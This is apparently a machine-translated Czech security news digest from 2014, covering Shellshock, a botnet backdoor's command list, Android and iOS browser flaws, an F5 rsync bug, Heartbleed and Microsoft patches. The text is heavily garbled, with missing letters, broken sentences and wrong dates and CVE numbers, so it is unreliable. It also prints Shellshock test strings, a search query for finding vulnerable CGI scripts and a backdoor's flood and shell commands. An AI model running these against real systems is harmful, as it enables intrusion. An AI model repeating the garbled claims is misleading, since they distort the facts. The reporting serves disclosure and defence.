K dispozici je tak primitivn honeypot otisky prst rutina implementovna, kter vyuv " BusyBox ", jak popsal Internet Storm Center zde .

shellshock_busybox_honeypot_fingerprinting_ortloff

Dalm kolem zloinci zat krabici obti je zahjeno v souladu 14. Zde je eeno, binrn provdt zaplaven IP 69.xx.xx.67 pomoc protokolu UDP na 50 sekund. V souladu 17 tonci zastavit zplavu, aby jej restartovat v ad 18, se zamenm 178.xx241 . " dn zabil. " odpov v souladu 21 se zobraz, protoe zplavy instrukce z linky 14 byl ji ukonen, kdy se tonk snail zastavit pomoc " *! KILLATTK "v dku 17.

Zde je kompletn seznam pkaz backdoor akceptuje:

! * PING - Odpovdi na "PONG!" * SH! - spustit libovoln pkaz shellu * GETLOCALIP! - Odpovdi na "moje IP: $ ipaddr" ! * Scanner | OFF - skenovn nhodn st, provst velmi malou slovnkov tok (viz ve), zkouka, zda cl je honeypot

! * HOLD - Drte povodn ! * Junk - Provete nezdrav povode ! * UDP - Provete UDP Flood * TCP! - Provete TCP oken * KILLATTK! - Zabij vechny povode ! * LOLNOGTFO - Ukonit backdoor.

Souvisejc binrn soubory:

73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 2d3e0be24ef668b85ed48e81ebb50dce50612fb8dce96879f80306701bc41614 ae3b4f296957ee0a208003569647f04e585775be1f3992921af996b320cf520b

Star chyba v shellu Bash postihuje pl miliardy zazen

26.9.2012 ZranitelnostiExperti na internetu objevili bezpenostn riziko, kter postihuje stovky milion pota, server a dalch zazen s operanmi systmy typu Unix, Linux nebo OS X.

Dra byla objevena v jednom z nejrozenjch prosted pkazovho dku znmm jako Bash, kter je soust mnoha unixovch a linuxovch systm, stejn jako operanho systmu pro OS X od Applu. Chyba, j experti pezdvaj Shellshock, me bt vyuita k zskn vzdlen kontroly nad tm jakmkoli systmem obsahujcm Bash. Podle nkterch odbornk je nov riziko mnohem nebezpenj, ne Heartbleed, o nm se hodn psalo v dubnu tohoto roku.

Zatmco Heartbleed umooval zjistit o uivateli co nejvc vc, Shellshock umouje pevzt pmou kontrolu nad systmem, uvedl profesor Alan Woodward z University of Surrey. Hearbleed ohrooval asi pl milionu pota na celm svt, Shellshock se vak podle konzervativnch odhad expert tk minimln pti set milion zazen. Problm je o to zvanj, e ada webovch server pouv software Apache, kter vyuv prv Bash.

Bash (Bourne-Again SHell) je pkazov dek na mnoha potach s Unixem. Unix je operan systm, na nm je postavena nebo se v nm inspiruje ada dalch OS napklad Linux nebo OS X. O novm riziku na svch strnkch informoval i mimo jin US Computer Emergency Readiness Team (US-Cert) s tm, e sprvci by mli co nejdve pout bezpenostn opravy. Jin bezpenostn experti vak varovali ped tm, e aktualizace jsou nepln a potae pln nezabezpe.

Shellshock je na kle od jedn do deseti oznaen jako destka, tud u ani neme bt vce nebezpen. Jednak je zde znan poet uivatel, kte mohou bt postieni, hlavn je vak pro Shellshock ji voln dostupn exploit a v se, e kyberzloinci aktivn hledaj webov strnky, kter by byly vhodn k proveden toku. Servery nyn podle expert chrn pedevm fakt, e kybernetit tonci jsou ln a pouze kopruj to, co ji jin vymysleli. Hledn exploit je tk prce, tud vtina tonk pouze vyuv ji publikovan informace.

I kdy bezpenostn experti ze spolenosti Rapid7 ohodnotili Bash jako 10/10 co do zvanosti, oznaili jej jako mlo sofistifikovan. S pouitm tto dry tonci mohou potenciln pevzt kontrolu nad operanm systmem, pistupovat k citlivm informacm, provdt zmny a tak dle, uvedl Tod Beardsley z Rapid7. Jak uvedla spolenost Kaspersky Labs, zranitelnost ji byla kyberzloinci zneuita k napaden webovch server. Bnm domcm uivatelm, kte maj obavy z bezpenosti, pak profesor Woodward doporuuje sledovat webov strnky vrobc hardwaru, pedevm smrova, a ekat na aktualizace.

Aktualizace CVE-2014-6271: Chyba zabezpeen v bash (Shellshock)25.9.2014 Zranitelnosti(Tento denk bude aktualizovn s odkazy na pslun zdroje brzy)

Vera, zranitelnost v bash bylo oznmeno, e byl pvodn nalezen Stephane Schazelas. Tato chyba zabezpeen umouje sputn libovolnho kdu v bash stanovenm konkrtnch promnnch prosted. Pozdji Travis Ormandymu vydala druh exploit, kter bude pracovat na opraven systm. Prokzn, e patch vera proputn je nepln.

Jak je dopad tto chyby zabezpeen?Zpotku chyba nevypad vechno vn. Spoutn pkaz je to, co bash pouv. Ale v tomto ppad, kd me bt provedena bez uivatelova zmru nastavenm promnn prosted.

Nejproblematitj situace je bash skripty provedeny pomoc cgi-bin. Specifikace CGI vyaduje webov server pevst HTTP hlaviky poadavku dodanch klientem promnn prosted. Pokud bash skript je voln pes cgi-bin, me tonk pout k sputn kdu jako webov server.

Jin, mn pravdpodobn scne zahrnovat SSH, co lze nastavit promnn prosted, ale musely by bt nastavena na serveru v konfiguranm souboru. Klienti DHCP me bt v nkterch ppadech spustit bash skripty a pout promnn prosted dodvan serverem. Tento ppad me bt zneuiteln, pokud se uivatel pipoj k nedvryhodn DHCP serverem ("cofeehouse wifi").

Mm pout opravu?Ano. Nplast se opravit jeden aspekt zranitelnosti. Nicmn, oprava nen kompletn a nen zcela opravit chybu. Nejsme si vdomi dnch vedlejch ink nplasti.

Jak jsou dal monosti? Co jinho bych ml dlat?Vzhledem k tomu, patch je nepln, mli byste se pokusit zavst dodaten opaten na ochranu systm. Rzn Intrusion Detection System (IDS) a Web Application Firewall (WAF) dodavatel vydali pravidla pro blokovn vykoisovn. Uvdomte si, e tato pravidla mohou bt nepln stejn. Mnoho pravidel, kter jsem vidl zatm jen podvat na etzec ") {(", kter byla ptomna v pvodn dkaz konceptu vyuit, ale me bt snadno zmnit napklad pidnm vce i rznch blch mst.

Dalo by se pepnout vchoz shell alternativu jako ksh nebo sh. Ale to je, bude pravdpodobn rozbt existujc skripty. Rzn mule pouvaj mrn odlin syntaxi.

Na mnoha vestavnch systm, kter ji me pout alternativn shell ("busybox"), kter nen zraniteln.

Jak mohu najt zraniteln systmy?Pokud se mete pihlsit do systmu, mete pout jeden z tchto zkuebnch etzc:

Chcete-li zjistit, zda se oprava, mete pout pvodn testovac etzec:

env x = '() {} ;;; echo zraniteln "sh-c" echo toto je test "Pokud se oprava, ale chci ukzat, e jste stle zraniteln, mete pout tento pkaz:

env X = '() {() => \' sh-c "echo termn";Tento pkaz vrt chybu na opravenou bitov kopie instalace systmu, ale to bude jet vytvoit przdn soubor s nzvem "echo".

Existuj rzn moduly pro zranitelnost skenery hledat zraniteln systmy. Mete tak pout rychl vyhledvn Google, kter by mohly pro zraniteln webov servery: filetype: sh inurl: cgi-bin strnky: [Vae domna] Tato Google zkontrolovat mj nvrat skripty, kter pouvaj jin skopky a pak bash.

Dvejte pozor, aby zkontrolovat webov servery ve vestavnch systmech, jako jsou smrovae, protoe me pracovat nejen bash skripty, ale mohou tak uinit na zvenmi oprvnnmi.

Jsou systmy ji zneuita?Vidli jsme zprvy vyhledv zranitelnosti.

Pozornost * NIX administrtoi, je as opravit!25.9.2014 ZranitelnostiV poslednch letech jsme zvykli na Microsoft zplaty, dleitch, kritick tch, kter mohly znamenat v systm pln zraniteln, pokud jste nepouili je. Asi jsme se stala tak zvykl, e nkdy zapomnme, e nae servery Linux tak nutn opravy.

Dnes jsem se dozvdl o kritick Bash nplast, kter se zabv CVE-2014 do 6271. Dle poradenstv :

"Chyba byla nalezena na cest Bash hodnocenho urit speciln vytvoen promnn prosted. tonk by mohl vyut tuto chybu potlait nebo bypass prosted omezen spoutt pkazy shellu. Nkter sluby a aplikace umonit vzdlen sputn neovench tonkm poskytovat promnn prosted, kter jim umon vyuvat tento problm. "

Nplasti jsou ji pipraveny pro vtinu distribuc Linux, jako je RedHat a Debian, a tak ztrcet as.

iOS 7.1.x vyuvat zpstupnn (CVE-2014-4377)22.9.2014 ZranitelnostiCopak upgradovat na iOS 8 jet? Krom mnoha novch funkc, Apple tak opravil nkolik bezpenostnch chyb v iOS 8. Napklad CVE-2014-4377, emise pamti corrupion v zkladn grafickou knihovnu Ios. Vyuvat je nyn k dispozici pro tuto chybu zabezpeen.

Poznmka: jsem ovil jet, e exploit funguje / genuine. Nebudeme spojovat v tomto bod k vyuit kdu, ale zkladn Google Fu by vm mlo umonit, aby ji nael.

Autor tvrd, e vyuit je "compleatly spolehliv a penositeln na iOS 7.1.x". Vyuit pichz v podob chybn PDF, kter by obvykle mly bt poskytnuty jako obrzek uvnit HTML strnky.

Webov prohle v Androidu obsahuje zvanou chybu

22.9.2014 ZranitelnostiOpen-sourcov webov prohle integrovan do operanho systmu Android obsahuje zranitelnost, kter umouje nebezpenm webovm strnkm umisovat javascriptov kd do jinch strnek.

Tento nebezpen kd nsledn me st cookie i hesla, poslat formule, zachycovat stisknut klves uivatelem a provdt spoustu dalch kon.

Webov prohlee jsou obecn nevreny tak, aby zamezovaly skriptu z jedn strnky pistupovat k obsahu na druh strnce. K zaruen tto ochrany je pouit princip SOP (Same Origin Policy): skripty mohou pouze st i upravovat prvky webovch strnek, je pichzej ze stejnho zdroje jako samotn skript. Zdroj je pak identifikovn pomoc protokolu, domny a sla portu. SOP by ml zabraovat tomu, aby napklad skript z http://erv.cz/ mohl pistupovat napklad k obsahu na http://computerworld.cz/.

Chyba v androidovm prohlei vak umouje prolomen SOP. Jak zjistil Rafay Baloch, pokud je javascriptov kd vytvoen uritm zpsobem, me zcela ignorovat SOP a bez jakchkoli dalch omezen zasahovat do obsahu jinch webovch strnek. To prakticky znamen, e jakkoli webov strnka navtven v prohlei me krst citliv data. Z uvedenho je zejm, e jde o kritickou zranitelnost, kterou je teba opravit, a to rychle.

Google ve snaze zskat nad Androidem vt kontrolu, svj prohle AOSP z Androidu sten odstranil u verze 4.2 a u verze 4.4 jej zcela nahradil prohleem Chrome. Stejn tak, jako se nevypaily po oficilnm ukonen podpory z internetu Windows XP, vak nezmizela ani aplikace open-sourcovho androidovho prohlee. Androidov prohle v souasn dob v relu pouv vce lid ne Chrome, jeliko jen mlo uivatel m nejnovj verzi Androidu a jet mn si nainstaluje Chrome a pouv ho.

Androidov prohle je tak zakomponovn do produkt tetch stran a nkte uivatel si jej dokonce nainstalovali na Android 4.4, jeliko jej preferuj oproti Chromu. Baloch problm nahlsil Googlu, avak spolenost mu odpovdla, e se jejm technikm nepovedlo problm reprodukovat, a celou vc uzavel. Baloch tedy cel ppad popsal na blogu a vyvinul framework, kter dru umouje testovat. Google nsledn oznmil, e se mu ji problm podailo zjistit a pracuje na zplat.

Jak vak zplata bude distribuovna, nen jasn. Chrome je aktualizovn pes Play Store a star androidov prohle byl opravovn jen v rmci aktualizac celho operanho systmu. Ty vak nejsou zdaleka tak ast. Bezpenostn experti proto v mezidob doporuuj, aby uivatel starch verzch Androidu peli na Chrome, Firefox nebo Operu.

PHP Opravuje nkolik chyb ve verzi 5.4 a 5.520.9.2014 ZranitelnostiPHP oznmil vydna verze 5.5.17 a 05.4.33. Deset chyby byly opraveny ve verzi 5.4.33 a 15 chyby byly opraveny ve verzi 5.5.17. Vichni uivatel PHP se doporuuje upgrade.The nejnovj verzi jsou k dispozici ke staen zde .

[1]-http://php.net/ChangeLog 5.php#5.4.33 [2] http://php.net/ChangeLog-5.php#5.5.17 [3] http: //windows.php NET / download

DARPA je po chyb v algoritmech implementovna v softwaru20.9.2014 ZranitelnostiDefense Advanced Projects agentura pro vzkum (DARPA), hled nov techniky analzy programu a nstroj, kter umouj analytikm urit slabiny algoritm implementovanch v softwaru pouvanho americkou vldou, vojensk a ekonomick subjekty, a oznmila, e bude pijmat nvrhy vzkumnch na toto tma do 28 jna. prostoru / asu Analza Cybersecurity (STAC), program je pedevm zamena na odhalen slabch mst v souvislosti s prostorem a asem zdroj chovnm pouit algoritm, stejn jako zraniteln msta vyplvajc z algoritmick sloitosti a tch vyuiteln pro bon toky kanlu. "jako nov obrannch technologi, aby star tdy zranitelnosti obtn spn vyut, protivnci pesthovat do novch td zranitelnosti," agentura uvedl v oznmen. "Chyby na zklad vadnch implementac algoritm byly populrn cle pro mnoho let. Avak pot, co nov obrann technologie, aby zranitelnosti na zklad chybnch implementac mn bnch i ztench vyuvat, protivnci se obrtit svou pozornost na slab msta vyplvajcch samotnch algoritm." Agentura je nastaven na hledn tch zranitelnost jako prvn. "Vvoj novch metod analzy program najt algoritmick vyuit prostedk zranitelnosti nebude snadn," uvedly. "Analza bude pravdpodobn muset najt cesty vedouc z neptelskch zench vstup na opakovn struktur, kter by mohly spotebovat ochromujc mnostv prostor a as, a cesty vedouc z tajemstv vstup, jejich prostor nebo doba pouvn potenciln me dojt k niku informac. Analzy tak budou muset pedvdat hranice na msto a doba pouvn dostaten pesn rozliovat mezi ppady, kdy je to mon odepen sluby nebo netsnosti a ppady, kdy tomu tak nen. " Oni pedpovdaj, e "dokonal" automatizovan nstroj, kter me poskytnout odpovdi na netrivilnch otzek o chovn programu . bude mon rozvjet, ale vte, e kombinovan nvsy automatizovan analzy me bt uiten, "Program STAC sna zlohy podl dvou hlavnch vkonnostnch os: rozsah a rychlost," vysvtlili. "Scale odkazuje na potebu analz, kter jsou schopny s ohledem na vt kusy softwaru, od tch, kter implementovat sov sluby se obvykle pohybuje v rozmez stovek tisc dk zdrojovho kdu, aby i vt systmy zahrnujc miliony i destky milion dk kd. Speed se vztahuje k poteb zvit rychlost, pi kter me lidsk analytici analyzovat software pomoc automatizovanch nstroj, z tisc dk kdu za hodinu a desetitisce, statisce nebo miliony dk kdu za hodinu . " Pro vce informac o programu, podvejte se na oznmen neusilovat , a velmi podrobn oznmen .

FreeBSD Denial of Service poradenstv (CVE-2004 a 0230)17.9.2014 ZranitelnostiChyba byla objevena Johnathan Looney na Juniper Sirt ve FreeBSD (zklad pro Junos a mnoho dalch vrobk) ve zpsobu, jakm FreeBSD zpracovv uritm pakety TCP (https://www.freebsd.org/security/advisories/FreeBSD-SA -14: 19.tcp.asc) Pokud budete poslat TCP SYN pakety pro existujc pipojen (tedy sprvn zdroj IP, zdrojov port, clov IP, clov port kombinaci), operan systm zbourat pipojen.

tok je podobn "uklouznut v okn TCP" tok popsal v roce 2004 Paul Watson (http://packetstormsecurity.com/files/author/3245/), ale pomoc SYN pakety msto RST. Jeden z Psovodi spn reprodukovat tok ve sv laboratoi.

Pro ty z vs, kter nemaj FreeBSD ve vaem prosted, pravdpodobn ano. Existuje ada ppravk, kter vyuvaj FreeBSD jako jejich zkladn operan systm. Mlo, e na jae na mysli, jsou OSX, Bluecoats Checkpoint NetScaler a vce (sten seznam je zde http://en.wikipedia.org/wiki/List_of_products_based_on_FreeBSD).

Dvejte pozor na aktualizace z vaich dodavatel, Juniper je tady -> http://kb.juniper.net/ InfoCenter ? / index page = content & id = JSA10638 & cat = SIRT_1 & actp = SEZNAM

Zranitelnosti st IT administrtoi mohou pouvat pro ochranu sv st12.9.2014 ZranitelnostiBt schopen pizpsobit se zmnm je jednou z nejdleitjch schopnost v oblasti zabezpeen dnes, hlavn proto, e toky na obranu proti jsou schopni udlat tot. Vysplost souasnch hrozeb je vidt pedevm v jejich schopnosti pizpsobit na zklad slabch ivotnho prosted, kter se zamuj. V tomto pspvku se budeme snait vidt stm, jak tonci je vidt - pes jejich zranitelnosti - a zase to asi do veden na to, jak sprvcm IT by ml chrnit sv st. Lid jsou nejslabm lnkem Lid budou vdy zstane citliv na vnj podnty, a to zejmna tch, kter vyvol siln emoce. To je dvod, pro sociln inenrstv bude vdy soust tok - existuje mnoho technik, kter maj bt pouity, a vysok pravdpodobnost innosti. Pijmn pedpoklad, e lid budou vdy stane obt tok socilnho inenrstv je dleit pro IT administrtoi jednodue proto, e je to pravda. Mus bezpenostn s by mla bt navrena s ohledem na tuto skutenost, bez ohledu na to, jak orientovan jsou zamstnanci. Mohou IT administrtoi: 1. Konfiguraci st, aby se zabrnilo nejen tonkm dostat se do st, ale tak zskvn dat z nj. Tmto zpsobem, i kdy je tonk schopen zskat kontrolu nad strojem v sti, exfiltrating dn kraden daje bude obtn. dn spravovny zen pstupu Firewall a s by vrazn pomoci tohoto cle doshnout. Inteligence hrozba bude tak hrt velkou roli zde tak, jako IP adres pouvanch jako C & Cs tok. 2. Segment st v zvislosti na rovni zabezpeen systmy potebuj. Kritick systmy mus bt oddleny od "normln" ty, a u fyzicky nebo prostednictvm segmentu st, kter jsou pipojen k. Krom nich je vak vzdlvn zamstnanc je stle dleit a mla by bt pravideln dlat. nejbezpenj msto je nejnebezpenj Dokonce i ty nejmen mezery zabezpeen v rmci st me vst k nejvtm poruen. tonci vd dobe, a to je dleit pro IT administrtorm udrovat ji v mysli. S by mla bt pedmtem auditu pravideln, aby se ujistil, e vechny plochy jsou dn zajitny. Napklad IT administrtoi se nemus brt v vahu, e oni sami jsou potencilnmi cli, nebo e urit zazen v sti me bt tak infekce body, jako jsou Sov tiskrna nebo dokonce router . Tot plat i pro webov administrtory. tonci se nemus pmo poruit vysoce zabezpeen strnky, jako je napklad bankovnictv webov strnky, msto toho, kontrola dalch mstech ve stejnm DMZ (demilitarizovan zna), kompromis je, a vyut dvru-vztah provst tok side-channel proti bankovnm webu. Lid pouvaj slab hesla Nen dnm tajemstvm, e pro sprvu hesel, je vzvou pro vtinu uivatel, tak pracuje na zklad pedpokladu, e vichni lenov st maj bezpen hesla prost nen mon. Pro zajitn st za pedpokladu, e uivatel maj nezabezpeen hesla by vyadovaly provdn dalch opaten, ovovn, jako dvoufaktorov autentizace , nebo dokonce biometrickch daj. S je pronsleduje duch stroje Vechny st maj duchy stroj v nich. Jedn se o stroje, kter nejsou nalezen v sti topologie map, ale jsou pipojeny k sti. Ty se mohou skldat z "osobnch zazen, externch partner zamstnanc zazen nebo stroj, kter by mly bt v dchodu, ale nejsou. tonci pka na tchto strojch, protoe poskytuj jak pstup k sti a stealth. Za elem obrany sprvci IT mus bt zjem o monitorovn systm, kter jsou pipojeny k sti. Je teba, aby zavedla mechanismus zen pstupu k sti sledovat a dit rove pstupu tchto duch stroje jsou oprvnni v sti. Star zranitelnosti jsou spolehliv a mohou bt stle pouvny Posouzen a een softwarov zranitelnosti je rozhodujc proces pro kadho sprvce IT, a ml by vdy pokrt vechny chyby - nov i star. IT sprvcm je teba mt na pamti, e zranitelnost zstane hrozba k sti, pokud nejsou eeny, bez ohledu na to, jak dlouho jeho byla, protoe to bylo objeveno. Autor: Ziv Chang, editel Cyber bezpenostn een na Trend Micro .

F5 BigIP neoven rsync Vulnerability8.9.2014 ZranitelnostiDvod, pro jsem se rozhodl napsat tuto chybu nen skutenost, e je to velmi populrn systm, nebo e existuje obrovsk riziko zde. Hlavnm dvodem je to, e mi pipadala s jistou dvkou smutku, kter budeme muset eit tento problm v roce 2014 Napklad, nael jsem nvod konfiguraci rsync z roku 1999, kter doporuuje pouit rsync pes ssh [1].

F5 vyuv rsync pro synchronizaci konfigurace v ppad, e pro vyrovnvn zaten BigIP se pouv v reimu vysok dostupnosti. Je smutn, e rsync server, kter se pouv pro toto nevyaduje dn ovovn. Vsledkem je, e tonk me nahrvat a stahovat libovoln soubory. Proof of concept vyut obrzky "authorized_keys" soubor umoujc tonkovi ssh do zazen a zskn plnho pstupu shell. Aby bylo zraniteln, rozhran pouv k synchronizaci zazen mus bt vystavena [2].

F5 dlal patch k dispozici [3].

Ale myslm, e lekce je vt ne "Patch F5". Jedn se o nezapomnat historii. V mnoha z naich kurz, stnost je dvod, pro jsou nkter star zranitelnosti. Napklad nae " Zajitn Unix "tda se dje pes nkter problmy s" r "sluby, jako je" rsh "a jak automatizovat tm cokoliv pomoc ssh.

Co byste mli udlat? Jako prvn krok, rychl skenovn v sti otevench rsync servery (port 873 TCP). Dle, pokud pouvte ssh, jak byste mli, podvejte se na to, jak se vm poda ssh kle, protoe to je dal velk problm. Jste udret sv tajn kle v jedn (a pouze jeden), bezpen msto? Myslte si, pouvat rzn kle pro rzn ely? To me bt vt projekt vypracovat a realizovat sprvn.

[1] http://everythinglinux.org/rsync/ [2] http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15236.html

Heartbleed stle kritick hrozba4.9.2014 Zranitelnosti

Cyber tonci byli rychle vyut Hearbleed OpenSSL chyba, ve vi stovek tisc tok za den v tdnu po veejnm odhalen sv existence, statistiky sdleny v posledn tvrtletn zpravodajsk Threat Report IBM X-Force ukzaly. "Velk draz byl kladen na ppravu a zmrnn zero-day toky, ale v ppad Heartbleed, vce zajmav studie dojde po zveejnn, kdy oba tonci a podniky jsou zvodn proti asu," poznamenal Leslie Horacek, manaer odpov ohroen . IBM X-Force bezpenostnho vzkumu skupiny "IBM Managed Security Services (MSS) svdkem tonky okamit pebudovat a vyuvn chybu v globlnm mtku," sdlela, a toky piel rychl a siln (kliknte na screenshot pro zvten): Mn ne dva tdny po, poet tok, kter se sna zneut chybu vrazn klesla, ale je stle vznamn. "MSS vid v prmru 7.000 tok za den po velkm toku," je uvedeno v zprv (nutn registrace). "Tam bylo mnoho ponauen z Heartbleed toky," vzkumnci poukazuj. "Organizace, kter se snaila k udrovn aktuln databze aktivum byly ponechny slep, kter systmy jsou zraniteln a kter systmy byly kritick. I kdyby mli pln reakce na incidenty, potebovali databze up-to-date majetku za elem jeho nasazen. " jejich zmrnn techniky, jako je pouit brny firewall blokovat vtinu tok, stejn jako detekci a prevenci naruen zazen me pomoci snit riziko a patch me bt nasazen. Mezi prodejci software obsahujc tuto chybu me tak nabdnout doasn nhradn een, a konen, doasn een, kter se asto nebere v vahu vypnn zraniteln systmy do patch k dispozici. Zatmco tento posledn volba nen obvykle pivtal podniky, jak se jejich systmy a uivatelskch dat mon ohroena je jet hor jeden. Bohuel, posledn sla ukazuj, e v roce i pes obrovsk pozornosti Heartbleed obdrela, mnoho systm stle unpatched, a to je situace, kter tonci budou i nadle vyuvat.

Nov Chrome opravuje 50 bezpenostnch otzek, chyba lovec dostane $ 30k2.9.2014 ZranitelnostiKter zavedly 50 opravy zabezpeen , tm Google Chrome je vytlaena novou stabiln verzi oblbenho prohlee.

Spolenost nesdl mnoho podrobnost o chybch, protoe je to prvn ekaj na vtinu uivatel za elem provdn oprav, ale bylo zjitno, e zskal 30.000 dolar na nkolika vzkumnch pracovnk urench pouze lokihardt @ asrt pro zveejovn "kombinace chyb v V8, IPC, synchronizace a rozen, kter mohou vst ke vzdlenmu sputn kdu mimo sandbox. " Jin vdci se udluje od 4000 dolar a 500 dolar za zabil vysokch a stednch zvanosti chyby a bezpenostn tm Chrome byl chvlen pro nalezen irok . ada nedostatk prostednictvm internch audit, fuzzing a dalch iniciativ uivatel Windows maj dal dobrou zprvu: Windows 64bit Chrome je pry "stable". "64-bit Chrome nabz mnoho vhod pro rychlost, stabilitu a bezpenost Nae men ukzala, e nativn. 64-bitov verze Chrome se zlepila rychlost na mnoho naich grafiky a medilnch mtek, "sdlen softwarov inenr Will Harris v blogu oznmil vydn. "Napklad VP9 kodek, kter je pouvn v High Definition videa z YouTube ukazuje 15% zlepen vkonu dekdovn. Men stability od lid, rozhodli do na Canary, Dev a Beta 64-bitov kanly potvrzuj, e 64-bit rendering motory jsou tm dvakrt tak stabiln jako 32-bitov motor pi manipulaci typick webov obsah. Konen, na 64-bit, nae obrana do hloubky zabezpeen sniujc zvanost rizika, jako je Partition Alloc jsou schopni mnohem efektivnji brnit proti zranitelnosti, kter se spolhaj na kontrolu rozloen pamti objekt. " Uivatel t na pouit 64-bit Chrome, muste run sthnout instaltor, a bt si vdom, e v souasn dob neexistuje 32-bitov podpora NPAPI plugin.

Vdci vyuvaj chybu vzat tajn uivatelm jejich tajemstv29.8.2014 ZranitelnostiTajemstv, kter sdlte na tajemstv, populrn aplikace, kter umouje lidem sdlet zprvy anonymn v rmci svho kruhu ptel, ptel ptel a veejnosti, me bt snadno pist na vs, jestli tonk v, e e-mailov adresa, kterou jste pouili, aby se et.

Proof-of-concept toku byl navren a proveden blmi hat hackei Ben Caudill a Bryan Seely, spoluzakladatel a CTO (v tomto poad) Rhino Security Labs, a je to docela snadn provst. Oni jen potebovali vytvoit sedm figurny tajn ty, odstranit jejich cel iPhone seznamy kontakt, pidejte sedm falen e-mailov adresy jako kontakty a pidejte e-mailovou adresu u cle. Dal, museli vytvoit nov tajn et a synchronizovat sv kontakty, kter dovolil, aby byly v "okruh ptel", kter sdlej sv tajemstv. Ale protoe sedm z t v kruhu jsou falen, je logick, e jakkoli tajemstv "od ptele", kter je sdlen pijede z jedinho relnho tu:. Clovm Dobrou zprvou je, e tento konkrtn zranitelnost neme bt vyuvny v opanm smru, nemete vidt nhodn tajemstv a zjistit, kdo je vysln. chyba, kter dovolila tento tok m bt provedena byla stanovena ji, jak vdci sdl jejich objev se spolenost za aplikaci, pes jejich chyby odmnu program, kter je zejm velmi spn. "Jak hackei zveejnit tyto druhy zranitelnosti prostednictvm na HackerOne odmnu, jen aby vce a vce vylepen," Secret generln editel David Byttow komentoval pro Wired. "Mli jsme nulovou veejn udlosti s ohledem na bezpenost a soukrom. Ve, co prola na tdrosti programu. " On tak k, e nic nenasvduje tomu, e ostatn hackei pili s exploit a pouil ho. Pesto, neme prokzat, e urit nikdo nem. Tajn uivatel by mli mt na pamti, e dn systm nen dostaten bezpen. Nejlep zpsob, jak udret tajemstv je, aby ji udreli, ne sdlet.

Kritick Delphi a C Builder ++ VCL knihovna chyba nalezena28.8.2014 ZranitelnostiBuffer overflow chyba zabezpeen, kter by mohla bt vyuita k provdn kodlivho kdu byla objevena v aplikaci Visual Component Library (VCL) knihovny Delphi a C ++ vvojovch prosted pro tvorbu aplikac Embarcadero a mohl by proto ovlivnit tak aplikace, kter byly vytvoeny pomoc software a kter pouvaj postienou knihovnu.

Problm byl poprv objeven jdra bezpenostn vzkumnk. "Marcos Accossatto z naeho Exploit psan tm zjistil chybu v postienm dosti manuln zmnou nkter hodnoty v BMP zhlav Ukzkov obrzek, pozdji potvrzuje zjitn tkajc se sadou aplikac pro manipulaci s image msta," vysvtlil Flavio De Cristofaro, firmy VP inenrstv pro profesionln produkty. "Pi manipulaci soubor BMP, bylo zjitno, e nkter aplikace sady by dojt k chyb. To ns vedlo k pedpokldat softwarovou knihovnu, spolen pro vechny aplikace, byl pravdpodobn zodpovdn za havrii, kter ns vedla k vink. " "C ++ Builder a Delphi byly pouity pi vvoji softwaru pro mnoho let. Finann instituce, zdravotnick organizace a firmy v nkolika dalch odvtvch se vyvjely tamn domc aplikace pouvajc tyto produkty," poznamenal, a ekl, e je to tk ci, kter konkrtn software je ovlivnn. chybu zabezpeen lze zneut v mst, je-li uivatel pro zpstupnn chybn soubor BMP na postienou aplikaci. "I kdy na stran klienta tok se zd bt nejpravdpodobnj cl toku, nkter aplikace umouj vzdlen uivatel nahrt chybn soubory. V tomto ppad je postien aplikace me bt vzdlen zneuiteln, "De Cristofaro dodal. Jakmile zranitelnost zneut, tonk m stejnou rove oprvnn uivatele, b zraniteln aplikace. To se asto promt do schopnosti vykonat cokoliv programu, kter nebo ona chce. chyba byla oprava, a v zvislosti na verzi Delphi a C ++ Builder, mohou uivatel dlat nkolik vc . "Uivatel budou muset zkontrolovat novj verze softwaru, kter obsahuje tuto opravu do postien softwarovch komponent a, za nae porozumn, budou muset pekompilovat kd pomoc nov verze softwaru, "radil. "alternativn ovlivnn uivatel mohou zvit nahrad postienou soust (VCL) s ekvivalentnm balku pro manipulaci s obrzky. Tak, pokud postien uivatel nemaj k dispozici zdrojov kd, nebo nejsou ochotni pekompilovat program, mohou pout jin software, jako Sentinel nebo Emet tet strany, kter by mohla pomoci, aby se zabrnilo zneuvn postiench systm do jist mry. " Ve vech ppad, uivatel by mli kontaktovat Embarcadero Dal informace o tom, jak problm vyeit. Core Security tak nabdl pomoc spolenostem, kter ji mohli potebovat, a oznmil , e se neuvoln pkladu kdu veejn v souasn dob, jak dt dotenm spolenosti dost asu na zplatovn.

Microsoft sprav rozbit Security Patch MS14-04528.8.2014 ZranitelnostiMicrosoft dnes re-povolen bulletin zabezpeen MS14-045 , kter byla staena krtce po zmnch v srpnu Patch ter , protoe poet uivatel hleny pdy a modr obrazovky. Patch byl odstrann z webu Windows Update 15 srpna, ti dny pot, co byl proputn v rmci msnho cyklu aplikace nplasti Microsoft.

"Jakmile jsme si uvdomili nkterch problm, jsme zaali recenzi a hned vythl problematick aktualizace, take to nen k dispozici ke staen," k Tracey Pretorius, editel Trustworthy Computing ve spolenosti Microsoft. "Pak jsme zaali pracovat na plnu RERELEASE postien aktualizace."

MS14-045 oprava chyby zabezpeen ovladae reimu jdra, kter byly hodnoceny dleit Microsoft, protoe vyaduj platn poven a mstn pstup za elem vyuit. spn vyuije mohlo vst k poven oprvnn na infikovan stroj se systmem Windows.

Microsoft uvedl, e v dob, kdy otzka psmo oprava v aktualizaci byl vink zpsob vykazovan zhroucen systmu. Microsoft uvedl, e byly ovlivnny pouze mal poet pota. Tam byly jin problmy s bulletinu nejzvanj zpsobujc systmy se zhrout a in 0 50 stop chybov zprva po instalaci. Uivatel byli tak svdky "soubor je ji pouvn" chybov zprvy, protoe emise psma v pochybnost.

Chyby vliv na systmech Windows celou cestu zpt na systm Windows Server 2003 a vechny podporovan desktopov verze systmu Windows. Uivatel Windows Update automaticky zskat opravu, jinak, Microsoft doporuuje uivatelm instalovat aktualizace.

Tento msc aktualizace mla odlin IE pocit k nim s jinou kumulativn aktualizace zplatovn 26 zabezpeen v aplikaci Microsoft vlajkov lodi prohlei, vetn veejn oznmenou chybu zabezpeen, kter je pravdpodobn, e se vyuv ve voln prod. Vech 26 zranitelnost byly hodnoceny rozhodujc a me bt vzdlen zneut.

